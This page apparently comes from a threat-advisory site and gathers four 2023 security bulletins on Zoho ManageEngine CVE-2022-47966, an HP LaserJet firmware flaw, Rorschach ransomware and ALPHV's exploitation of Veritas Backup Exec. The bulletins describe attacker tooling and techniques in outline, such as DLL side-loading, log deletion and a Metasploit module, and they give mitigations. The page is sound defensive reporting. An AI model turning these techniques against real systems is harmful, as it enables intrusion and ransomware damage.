What are the Actionable Threat Warnings? | Threat Advice
ACTIONABLE - Severity: High - TLP:GREEN - Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products
Summary:
“Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access Manager Plus, ADManager Plus, ADSelfService Plus, Password Manager Pro, Remote Access Plus, and Remote Monitoring and Management (RMM), are affected by the issue” (The Hacker News, 2023).
The development comes after penetration testing firm Horizon3 released proof of concept code for CVE-2022-47966 last month. According to researchers at Bitdefender, they noticed attacks exploiting the flaw immediately the next day after the POC was released. The majority of the attacks observed were targeted toward victims located in Australia, Canada, Italy, Mexico, the Netherlands, Nigeria, Ukraine, the United Kingdom, and the United States. As of writing, there are between 2,000-4,000 servers accessible to the internet that are running one of the impacted Zoho ManageEngine products. However, researchers say not all servers are exploitable with the current POC code, since SAML needs to be configured.
Analyst comments:
Bitdefender notes a common trend among threat actors nowadays where they will identify an RCE vulnerability (preferably with a public PoC example) that impacts as many companies as possible. Once identified, the actors will use automated scanners to identify and compromise vulnerable systems. CVE-2022-47966 is the latest RCE being exploited as it impacts over a dozen products used by organizations across the globe, in addition to a POC being released for the flaw. In the latest attacks observed exploiting CVE-2022-47966, researchers observed the actors deploying tools such as Netcat and Cobalt Strike beacons after initial access was gained. The hackers were also observed installing AnyDesk software for further persistence. In some cases, the actors attempted to install a ransomware payload for the Buhti ransomware. This ransomware seems to be a new group. According to researchers, Buhti ransomware is designed to target Linux systems and is written in the Go programming language.
Mitigation:
(Bitdefender) This vulnerability is another clear reminder of the importance of keeping systems up to date with the latest security patches while also employing strong perimeter defense. Attackers don't need to scour for new exploits or novel techniques when they know that many organizations are vulnerable to older exploits due, in part, to the lack of proper patch management and risk management.
In addition to prevention and cyber hygiene, multi-layered protection on all endpoints, servers, and workloads is critical. In our telemetry, we have identified the following indicators of compromise detected by different endpoint security modules:
Implementing IP, domain, and URL reputation is one of the most effective methods of defeating automated vulnerability exploits. According to analysis in the Data Breach Investigations Report 2022, only 0.4% of the IPs that attempted RCE were not seen in a previous attack. Blocking bad IPs, domains, or URLs on all devices, including remote and work-from-home endpoints, can be highly effective.
Finally, companies of all sizes should implement detection and response capabilities to detect any suspicious activity on the network and minimize the dwell time of adversaries
Source:
https://thehackernews.com/2023/02/experts-sound-alarm-over-growing.html
https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966
https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html
ACTIONABLE - Severity: High - TLP:GREEN - HP to Patch Critical Bug in LaserJet Printers Within 90 Days
Summary:
In a security bulletin this week, HP announced that it would take up to 90 to fix a critical vulnerability impacting several of its business-grade printers with IPsec enabled and running FutureSmart firmware version 5.6.
“IPsec (Internet Protocol Security) is an IP network security protocol suite used in corporate networks to secure remote or internal communications and prevent unauthorized access to assets, including printers. FutureSmart allows users to work and configure printers either from a control panel available at the printer or from a web browser for remote access” (Bleeping Computer, 2023).
Tracked as CVE-2023-1707 (CVSS 9.1), nearly 50 HP Enterprise LaserJet and HP LaserJet managed printer models are vulnerable to the flaw. According to HP, successful exploitation of CVE-2023-1707 could lead to information disclosure, allowing threat actors to access sensitive information transmitted between the vulnerable HP Printers and other devices on the network.
Analyst comments:
Below is a list of the impacted HP printer models:
- HP Color LaserJet Enterprise M455
- HP Color LaserJet Enterprise MFP M480
- HP Color LaserJet Managed E45028
- HP Color LaserJet Managed MFP E47528
- HP Color LaserJet Managed MFP E785dn, HP Color LaserJet Managed MFP E78523, E78528
- HP Color LaserJet Managed MFP E786, HP Color LaserJet Managed Flow MFP E786, HP Color LaserJet Managed MFP E78625/30/35, HP Color LaserJet Managed Flow MFP E78625/30/35
- HP Color LaserJet Managed MFP E877, E87740/50/60/70, HP Color LaserJet Managed Flow E87740/50/60/70
- HP LaserJet Enterprise M406
- HP LaserJet Enterprise M407
- HP LaserJet Enterprise MFP M430
- HP LaserJet Enterprise MFP M431
- HP LaserJet Managed E40040
- HP LaserJet Managed MFP E42540
- HP LaserJet Managed MFP E730, HP LaserJet Managed MFP E73025, E73030
- HP LaserJet Managed MFP E731, HP LaserJet Managed Flow MFP M731, HP LaserJet Managed MFP E73130/35/40, HP LaserJet Managed Flow MFP E73130/35/40
- HP LaserJet Managed MFP E826dn, HP LaserJet Managed Flow MFP E826z, HP LaserJet Managed E82650/60/70, HP LaserJet Managed E82650/60/70
Users can no longer download the impacted FutureSmart version. Given that it will take 90 days for a patch to be released, users currently running FutureSmart 5.6 should downgrade to FutureSmart version FS 5.5.0.3 to prevent potential attacks.
Mitigation:
If you are using any of the impacted printer models, please defer to HP’s official download portal below to source the correct firmware package for your device:
https://support.hp.com/us-en/drivers
Source:
https://www.bleepingcomputer.com/ne...ical-bug-in-laserjet-printers-within-90-days/
INFORMATIONAL - Severity: Medium - TLP:GREEN - New Rorschach Ransomware Is the Fastest Encryptor Seen So Far
Summary:
Security researchers at Check Point uncovered a new ransomware strain, dubbed Rorschach, which features encryption speeds never seen before. “The encryption scheme blends the curve25519 and eSTREAM cipher hc-128 algorithms and follows the intermittent encryption trend, meaning that it encrypts the files only partially, lending it increased processing speed” (Bleeping Computer, 2023).
CheckPoint discovered the ransomware after it was deployed on the network of an unidentified U.S company using DLL side-loading via a singed component in Cortex XDR, an extended detection and response tool developed by Palo Alto Networks.
“The attacker used the Cortex XDR Dump Service Tool (cy.exe) version 7.3.0.16740 to sideload the Rorschach loader and injector (winutils.dll), which lead to launching the ransomware payload, “config.ini,” into a a Notepad process. The loader file features UPX-style anti-analysis protection, while the main payload is protected against reverse engineering and detection by virtualizing parts of the code using the VMProtect software” (Bleeping Computer, 2023).
If executed on a Windows Domain Controller, researchers note that Rorschach will create a Group Policy, enabling the malware to propagate to other hosts on the domain. Once a targeted machine is compromised, the ransomware strain will delete four event logs (Application, Security, System and Windows Powershell), allowing it to erase traces of compromise.
Analyst comments:
Researchers at CheckPoint did a test run to determine the speed in which Rorschach is capable of encrypting files. In total, they set up a test with 220,200 files on a 6-core CPU machine. Upon execution of the ransomware strain, it took 4.5 minutes to encrypt all 220,200 files, which is very fast considering LockBit V2, another strain known to be one of the fastest encryptors, took 7 minutes.
“After locking the system, the malware drops a ransom note similar to the format used by the Yanlowang ransomware. According to the researchers, a previous version of malware used a ransom note similar to what DarkSide used. Check Point says that this similarity is likely what caused other researchers to mistake a different version of Rorschach with DarkSide, an operation that rebranded to BlackMatter in 2021, and disappeared the same year” (Bleeping Computer, 2023).
Mitigation:
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk- based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check Your Security Team's Work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained how to avoid and spot phishing emails. Multi Factor authentication can help prevent malicious access to sensitive services.
Source:
https://www.bleepingcomputer.com/ne...somware-is-the-fastest-encryptor-seen-so-far/
INFORMATIONAL - Severity: Medium - TLP:GREEN - ALPHV Ransomware Exploits Veritas Backup Exec Bugs for Initial Access
Summary:
Researchers observed an affiliate of ALPHV exploiting three vulnerabilities in Veritas Backup products to gain initial access to target networks. The ALPHV ransomware group was founded in December 2021 and is believed to be run by former members of the Darkside and Blackmatter ransomware groups who shut down their operations to avoid law enforcement pressure.
"Mandiant reports that it observed the first cases of Veritas flaws exploitation in the wild on October 22, 2022. The high-severity flaws targeted by UNC4466 are:
- CVE-2021-27876: Arbitrary file access flaw caused by an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.1)
- CVE-2021-27877: Remote unauthorized access and privileged command execution to the BE Agent via SHA authentication. (CVSS score: 8.2)
- CVE-2021-27878: Arbitrary command execution flaw result of an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.8)
All three flaws impact the Veritas Backup software. The vendor disclosed them in March 2021 and released a fix with version 21.2. However, despite over two years having passed since then, many endpoints remain vulnerable as they have not updated to a safe version." (Bleeping Computer, 2023)
According to Mandiant, a commercial scanning service discovered more than 8,500 IP addresses that advertise the "Symantec/Veritas Backup Exec ndmp" service on default ports, making them vulnerable to exploitation by attackers. In September 2022, a Metasploit module was released to the public, enabling attackers to establish a session and engage with compromised endpoints. UNC4466 was identified by Mandiant to have leveraged this module for their malicious activities about a month after it became available.
Analyst comments:
Researchers at Mandiant reported that UNC4466 gains access to an internet-facing Windows server running Veritas backup exec using the Metasploit module and establishes persistent access to the system. Following the initial compromise, the attacker employs Advanced IP Scanner and ADRecon tools to collect information about the victim's network. Subsequently, they download various tools, such as LAZAGNE, LOGOLO, WINSW, RCLONE, and the ALPHV ransomware encryptor via the Background Intelligent Transfer Service.
Mitigation:
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk- based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check Your Security Team's Work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained how to avoid and spot phishing emails. Multi Factor authentication can help prevent malicious access to sensitive services.
Source:
https://www.bleepingcomputer.com/ne...-veritas-backup-exec-bugs-for-initial-access/
https://www.mandiant.com/resources/blog/alphv-ransomware-backup
|
|